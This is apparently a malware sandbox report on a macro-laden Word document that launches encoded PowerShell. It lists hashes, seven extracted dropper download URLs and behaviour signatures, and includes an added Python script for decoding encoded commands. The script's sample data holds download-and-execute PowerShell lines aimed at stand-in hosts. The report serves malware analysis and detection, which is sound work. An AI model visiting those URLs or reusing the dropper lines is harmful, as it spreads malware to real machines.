Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-05-2024 05:27

General

  • Target

    790fa0cbb62e5efdaab029d68caad4f8JaffaCakes118.doc

  • Size

    198KB

  • MD5

    790fa0cbb62e5efdaab029d68caad4f8

  • SHA1

    11ed4043da8adbd2aef9c93991b04d8f2c165024

  • SHA256

    39031955d734e86e67664eee812819b699a9bc4f869cfb4d28db7f4c99cbdcee

  • SHA512

    8da36db3a4e5913919f707eab832784aa370da3d41fcaeb037ee43d70780312f25b5d84da2dfc73d1895cec0f9c8073fa432e7ea68c259049694ca59a78ac361

  • SSDEEP

    1536:PGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilpfsdKY7xST/Ephkop8cEpTWj1K:xrfrzOH98ipg0EDvxBYIe

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://houtai.xiaopbk.com/install/t0H/

exe.dropper

https://gudangalami.com/ivo6rp/UaBj2/

exe.dropper

https://webhostingsrilanka.info/pkrgs/ODn/

exe.dropper

http://luzzeri.com/wp-includes/T1mrkC/

exe.dropper

http://mobithem.com/blogs/Z3/

exe.dropper

http://planosdesaudesemcarencia.com/erros/E8iv/

exe.dropper

http://lookuppopup.co.uk/content/uploads/XNEm9/

Signatures

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\790fa0cbb62e5efdaab029d68caad4f8JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod …
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2412
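The tree above shows WINWORD.EXE opening the document and, at the top level rather than under WINWORD.EXE, a powershell.exe launched with `-encod` (an abbreviation of `-EncodedCommand`; powershell.exe accepts any unambiguous prefix of a parameter name, plus the documented alias `-ec`). The page does not reproduce the encoded payload, but the Malware Config section lists the exe.dropper URLs the sandbox extracted from it. The Python below is an added example, not part of the sandbox report or of the sample, showing how an analyst does the same extraction from process-creation events: locate the encoded-command switch under any of its accepted spellings, decode the base64/UTF-16LE payload, and pull the URLs out. The events, the encoded script and every URL in it are constructed stand-ins; only the WINWORD.EXE and splwow64.exe entries copy the tree above.

```python
import base64
import binascii
import re
from typing import Optional

# '@' is deliberately excluded from the URL character set: Emotet-era droppers
# keep their download list as one '@'-joined string and call .Split('@') on it,
# so the delimiter must terminate a URL here even though '@' is legal in the
# userinfo part of a real URL.
URL_RE = re.compile(r"https?://[^\s'\"`@,;()<>]+", re.IGNORECASE)


def make_encoded_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse of make_encoded_command; None if the token is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def encoded_payload(cmd: str) -> Optional[str]:
    """Return the argument following an -EncodedCommand switch, or None.

    Matches -e, -enc, -encod, -EncodedCommand (any prefix) and the alias -ec,
    with either '-' or '/' as the switch character, case-insensitively.
    """
    tokens = cmd.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/":
            name = tok[1:].lower()
            if name and (name == "ec" or "encodedcommand".startswith(name)):
                return tokens[i + 1]
    return None


def extract_urls(script: str) -> list:
    """Pull http(s) URLs out of a decoded script (see URL_RE for the '@' caveat)."""
    return URL_RE.findall(script)


def triage(events: list) -> list:
    """Flag PowerShell launched with an encoded command, decode it, extract URLs.

    The parent image is reported as context only: in the sandbox tree the
    powershell.exe process sits at the top level, not under WINWORD.EXE, so a
    rule that *requires* an Office parent would miss this launch.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not e["image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
            continue
        b64 = encoded_payload(e["cmd"])
        if b64 is None:
            continue
        script = decode_encoded_command(b64)
        parent = by_pid.get(e["ppid"], {}).get("image")
        findings.append({
            "pid": e["pid"],
            "parent_image": parent,
            "decoded": script,
            "decode_failed": script is None,
            "urls": extract_urls(script) if script else [],
        })
    return findings


# Constructed stand-in for an Emotet-style dropper: '@'-joined URL list, try each.
_SAMPLE_SCRIPT = (
    "$u='http://example.test/wp-includes/abc/@https://example2.test/x/y/'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\a.exe');"
    "Start-Process ($env:TEMP+'\\a.exe');break}catch{}}"
)

# Constructed process-creation events in the shape of the sandbox tree.
# pid 2412 has no parent in the list, mirroring its top-level position above;
# pid 2500 is an extra hypothetical launch that uses the -ec alias under WINWORD.
SAMPLE_EVENTS = [
    {"pid": 2600, "ppid": 1000,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"'},
    {"pid": 2304, "ppid": 2600, "image": r"C:\Windows\splwow64.exe",
     "cmd": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 2412, "ppid": 4,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -encod " + make_encoded_command(_SAMPLE_SCRIPT)},
    {"pid": 2500, "ppid": 2600,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -ec " + make_encoded_command(
         "IEX (New-Object Net.WebClient).DownloadString('https://example3.test/dl/')")},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["pid"], f["parent_image"], f["urls"])
```

Run against real telemetry, the same functions apply to Sysmon Event ID 1 or EDR process-start records; `decode_failed` stays set when the argument after the switch is not valid base64 (a truncated command line, for instance), which is itself worth alerting on rather than silently dropping.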

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      2ff2ab63bde55978e37158936e4710ed

      SHA1

      1baf5439fb1d2eeaf8fd330e8e04f34e6fcfd594

      SHA256

      3a74126246e5a8f82c1110f8c365511207022d8411047dd0f0dabb2d346737fd

      SHA512

      1250bebd5947eb75fc443a8f38e87c223149b1b6b2611dd94c1ccfe577f568d50f87496906c3b2470064b81420bf522549108fdaa1866171103c40401a41e9d8

    • memory/2412-40-0x0000000002920000-0x0000000002928000-memory.dmp

      Filesize

      32KB

    • memory/2412-39-0x000000001B560000-0x000000001B842000-memory.dmp

      Filesize

      2.9MB

    • memory/2600-27-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2600-8-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-26-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-12-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-16-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-19-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-14-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-22-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-20-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-18-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-17-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-15-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-13-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-10-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-11-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-24-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-0-0x000000002F6D1000-0x000000002F6D2000-memory.dmp

      Filesize

      4KB

    • memory/2600-9-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-7-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-32-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-23-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-31-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-30-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-29-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-21-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-28-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-33-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-6-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-2-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/2600-45-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/2600-46-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-48-0x0000000005EA0000-0x0000000005FA0000-memory.dmp

      Filesize

      1024KB

    • memory/2600-49-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2600-25-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-67-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB